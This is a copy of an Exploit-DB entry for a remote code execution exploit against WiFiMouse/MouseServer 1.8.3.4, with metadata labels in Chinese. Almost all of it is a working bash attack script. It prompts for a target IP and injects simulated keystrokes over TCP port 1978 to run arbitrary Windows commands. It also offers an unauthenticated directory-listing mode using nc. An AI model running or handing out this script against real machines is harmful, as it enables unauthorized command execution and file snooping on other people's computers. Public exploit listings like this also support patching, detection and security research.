WiFiMouse 1.8.3.4 – Remote Code Execution (RCE)

  • 作者: FEBIN MON SAJI
    日期: 2022-09-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51016/
  • # Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
    # Date: 15-08-2022
    # Author: Febin
    # Vendor Homepage: http://necta.us/
    # Software Link: http://wifimouse.necta.us/#download
    # Version: 1.8.3.4
    # Tested on: Windows 10
    
    #!/bin/bash
    printf "
    WiFiMouse / MouseServer 1.8.3.4 Exploit
    
    by FEBIN
    
    "
    
    printf "[*] Enter the Target IP Address: "
    read TARGET
    
    
    
    rce(){
    printf "[*] Enter the Command to execute on the Target:"
    read CMD
    
    sh -c "echo 'key9[R] WIN d';sleep 1;echo 'key9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
    }
    
    dirlist(){
    
    echo "[*] User's Home Directory Contents:"
    
    echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-
    
    while $true
    do
    printf "\nList Directory:> "
    read DIR
    echo "[+] Contents of $DIR: "
    echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
    done
    
    
    }
    
    printf "
     [1] Remote Command Execution
     [2] Directory Listing
     
     "
    printf "Enter Your Choice (1 or 2) : "
    read CHOICE
    
    if [[ $CHOICE == "1" ]]
    then
    rce
    elif [[ $CHOICE == "2" ]]
    then
    dirlist
    
    else
    echo "[-] Invalid Choice!"
    fi